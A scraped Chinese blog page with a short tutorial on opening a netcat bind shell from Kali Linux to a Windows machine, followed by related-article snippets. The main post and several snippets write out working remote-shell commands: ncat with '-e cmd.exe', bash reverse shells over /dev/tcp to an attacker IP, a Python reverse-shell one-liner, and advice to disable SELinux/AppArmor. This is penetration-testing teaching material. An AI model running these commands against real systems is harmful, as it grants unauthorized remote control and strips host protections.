kali使用nc正向反弹windows shell

最新推荐文章于 2025-09-17 07:22:45 发布
最新推荐文章于 2025-09-17 07:22:45 发布
阅读量2k 收藏 10
点赞数
CC 4.0 BY-SA版权
分类专栏: Windows Linux 文章标签: windows 服务器 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/fittec/article/details/126811985
本文介绍了如何使用kali Linux通过nc工具创建一个正向反弹shell到Windows服务器。首先,需要在Windows上下载ncat并监听8888端口,然后在kali系统中连接该端口,成功后即可在kali终端中控制Windows系统。

1.下载 ncat.exe 并上传到windows 

 2.查看windows系统IP并运行ncat监听8888端口

 ncat -lvvp 8888 -e cmd.exe

 3.kali主机运行终端 并输入  nc 192.168.31.201 8888 回车后,将反弹windows系统shell到Kali终端

现在可通过这个shell对windows系统进行任何操作 

Kali-nc(瑞士军刀)使用
兔子扛刀
10-08 5171
瑞士军刀的基本使用
详解NC反弹shell的几种方法
01-08
假如ubuntu、CentOS为目标服务器系统 kali为攻击者的系统,ip为:192.168.0.4,开放7777端口且没被占用 最终是将ubuntu、CentOS的shell反弹kali正向反弹shell ubuntu或者CentOS上面输入 nc -lvp 7777 -e /bin/bash kali上输入 nc ip 7777 正向反弹是目标机先执行nc命令,然后kali上再进行nc监听,即可反弹shell。 需要目标机安装nc。 反向反弹shell 方法1:bash反弹 bash -i >& /dev/tcp/ip/port 0>&1 但首先需要在kali使用
【渗透测试笔记】之【内网渗透——传输层隧道(nc使用nc的正反向shell、bash(1)
2401_84969775的博客
05-13 738
(边界服务器,外网地址:192.168.8.56,内网地址:10.1.1.10)(边界服务器,外网地址:192.168.8.35,内网地址:10.1.1.13)(边界服务器,外网地址:192.168.8.56,内网地址:10.1.1.10)(边界服务器,外网地址:192.168.8.35,内网地址:10.1.1.13)(边界服务器,外网地址:192.168.8.35,内网地址:10.1.1.13)(边界服务器,外网地址:192.168.8.35,内网地址:10.1.1.13)目录,ubuntu是。
正向与反向Shell图解说明
最新发布
Bruce_xiaowei的博客
09-17 1249
正向Shell与反向Shell对比摘要 正向Shell(Bind Shell)由被控端监听端口,控制端主动连接获取权限,适用于被控端有公网IP的场景。反向Shell(Reverse Shell)则是控制端监听端口,被控端主动连接交出权限,更常用于绕过防火墙,因出站连接通常被允许。两者核心区别在于连接方向:正向Shell是"我去找你",反向Shell是"你把权限送过来"。由于反向Shell能有效突破网络限制,成为渗透测试中最常用的技术方案。实际应用中需注意Netcat版
Window下的反弹shell
qq_58000413的博客
05-05 1568
什么是正向shell?正向shell:控制端主动发起连接请求去连接被控制端,中间网络链路不存在阻碍。反向shell:被控制端主动发起连接去请求连接控制,通常被控端由于防火墙受限制、权限不足、端口被占用等问题导致被控端不能正常接收发送过来的数据包。
使用nc反弹shell方法
baidu_33260220的博客
05-08 6708
hacker机:192.168.1.1 目标机:192.168.1.2 1、在hacker机执行 nc -vlp 9999  (监听本机9999端口) 2、在目标机执行 bash -i >& /dev/tcp/192.168.1.1/9999 0>&1 成功反弹shell
反弹shell
weixin_43227251的博客
04-14 430
什么是反弹shell? 简单理解,通常是我们主动发起请求,去访问服务器某个IP的某个端口,比如我们常访问的web服务器:http/https://ip:80,这是因为在服务器上面开启了80端口的监听,我们去访问它的时候,就会给我们建立连接。而现在所谓的反弹shell指的是反过来在我们自己的公网vps建立监听,然后让服务器反弹一个shell来连接我们自己的主机,然后我们就能通过反弹shell去远程...
2024年运维最新【安全知识】——LInuxshell反弹姿势合集(更新中,【工作感悟】
m0_55030688的博客
05-04 733
bash -i 打开一个交互的bash& 将标准错误输出重定向到标准输出/dev/tcp/x.x.x.x/port 意为调用socket,建立socket连接,其中x.x.x.x为要反弹到的主机ip,port为端口0>&1 标准输入重定向到标准输出,实现你与反弹出来的shell的交互。
NC反弹Shell
收集盒 Book box
08-30 3058
使用NC反弹Shell 在进行Shell反弹时,有时会碰到服务器不支持PHP或者WebShell无法成功反弹Shell的情况,例如有的服务器只支持JSP,不支持PHP。此时,可以同样采用Windows下的经典的NC反弹Shell方法。 在Windows反弹CmdSh
nc.exe(nc反弹)
04-07
netcat被誉为网络安全界的‘瑞士军刀’,相信没有什么人不认识它吧...... 一个简单而有用的工具,透过使用TCP或UDP协议的网络连接去读写数据。它被设计成一个稳定的后门工具,能够直接由其它程序和脚本轻松驱动。同时,它也是一个功能强大的网络调试和探测工具,能够建立你需要的几乎所有类型的网络连接,还有几个很有意思的内置功能(详情请看下面的使用方法)。 在中国,它的WINDOWS版有两个版本,一个是原创者Chris Wysopal写的原版本,另一个是由‘红与黑’编译后的新‘浓缩’版。‘浓缩’版的主程序只有10多KB(10多KB的NC是不能完成下面所说的第4、第5种使用方法,有此功能的原版NC好象要60KB:P),虽然“体积”小,但很完成很多工作。
NCrar.rar 反弹工具
10-20
NCrar.rar 反弹工具 网络应用 内网入侵必备~~
NC反弹CMD.EXE
04-20
NC反弹CMD
常见工具 nc Wireshark反弹shell
代码审计
04-20 1581
常⽤⼯具 • 经常使⽤且功能强⼤ • 安全从业者必不可少的帮⼿ • Nc / ncat • Wireshark • Tcpdump nc -lvp 使用nc 监听特定的端口 nc -nv ip port 连接特定ip下的指定端口 NETCAT ——NC • ⺴络⼯具中的瑞⼠军⼑——⼩⾝材、⼤智慧 • 侦听模式 / 传输模式 • telnet / 获取banner信息 • 传输⽂本信息 • 传输⽂件/⺫录 • 加密传输⽂件 • 远程控制/⽊⻢ • 加密所有流量 • 流媒体服务器 • 远程克隆硬盘 root@
《红蓝攻防对抗实战》六.常规反弹利用NCwindows系统执行反弹shell
热门推荐
一只特立独行的兔先森
10-23 2万+
假设在内网环境中发现主机,通过漏洞获取到该主机控制权限,想要进一步对内网环境进行后续利用,这里可以通过反弹shell的方式去进行穿透,本次实验以nc工具为例来演示不同系统的操作
nc使用+反弹shell
2301_80366980的博客
02-18 1856
记录学习linuxnc使用,以及反弹shell仅供个人学习,如有冒犯请尽快联系。
8.kaliNC工具的使用方法
分享学习网络的点点滴滴
04-15 6089
nc工具的详细使用
kali /mac 成功的反弹shell语句
没有故事
04-21 1716
2: 这条命令使用kali 上执行的命令结果会在mac机器上显示出来,mac无法执行命令,kali上执行命令无结果,结果在mac上显示。8: 这个命令,在攻击机上执行,如果有报错会显示在受害者机器上,,攻击机上不显示报错语句。13:这条命令是同步两边执行的命令,不会显示结果。3: 命令执行成功,能反弹成功,但是输入命令无显示,不会用。14: 这条命令在攻击机上报错也不会同步到受害者机器上。该语句在监听机器上执行的语句会同步到被攻击机上。攻击机执行 ncat -u -lvp 3333。
kali监听不到反弹shell
03-02
### Kali Linux 无法接收反弹 Shell 的解决方案 当遇到 Kali Linux 无法接收到反弹 Shell 的情况时,可能的原因涉及多个方面。以下是详细的排查和解决办法: #### 1. 检查网络连接 确保攻击机(Kali Linux)与目标机器之间的网络连通性正常。可以使用 `ping` 或者 `traceroute` 命令验证两者之间是否有数据包丢失或路由问题。 ```bash ping 192.168.2.11 ``` 如果发现网络不通,则需进一步检查防火墙设置、路由器配置等问题[^1]。 #### 2. 确认监听端口状态 确认 Kali 上用于接收反弹 Shell 的端口号未被占用,并且已经启动了相应的监听服务。例如,在上述案例中提到的是 TCP 协议下的 6666 端口。可以通过 netstat 查看本机开放的端口列表以及对应的程序名称;也可以借助 nc (netcat) 工具开启一个新的监听实例。 ```bash sudo lsof -i :6666 # 查看指定端口是否已被其他进程绑定 nc -lvnp 6666 # 使用 NetCat 创建一个简单的TCP服务器等待客户端连接请求 ``` #### 3. 验证命令执行路径 对于 `/bin/bash -i >& /dev/tcp/192.168.2.11/6666 0>&1 &` 这样的反弹 shell 命令来说,其依赖于 bash 解释器的存在及其绝对路径为 "/bin/bash" 。因此建议先单独运行一次该指令片段以排除因环境差异而导致的功能失效风险。 ```bash which bash # 查询 Bash 实际安装位置 ls -l $(which bash) # 获取符号链接指向的目标文件属性信息 ``` #### 4. 排除 SELinux/AppArmor 影响 某些情况下,Linux 发行版自带的安全增强机制可能会阻止非法操作的发生。此时应临时关闭这些防护措施再尝试获取远程控制权。 ```bash setenforce 0 # 关闭SELinux强制模式 aa-disable profile # 禁用 AppArmor 对特定应用程序的限制策略 ``` #### 5. 测试不同类型的 Payload 考虑到实际环境中可能存在各种各样的安全设备会对流量进行监控分析处理,所以不妨多准备几种 payload 方案备用。比如采用 Python reverse_shell.py 脚本来代替传统的 Unix/Linux 下基于 execve() 函数调用来实现相同功能的效果。 ```python import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.2.11",6666));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]); ```
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

宏权实验室

有你的鼓励,我会更加努力。

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值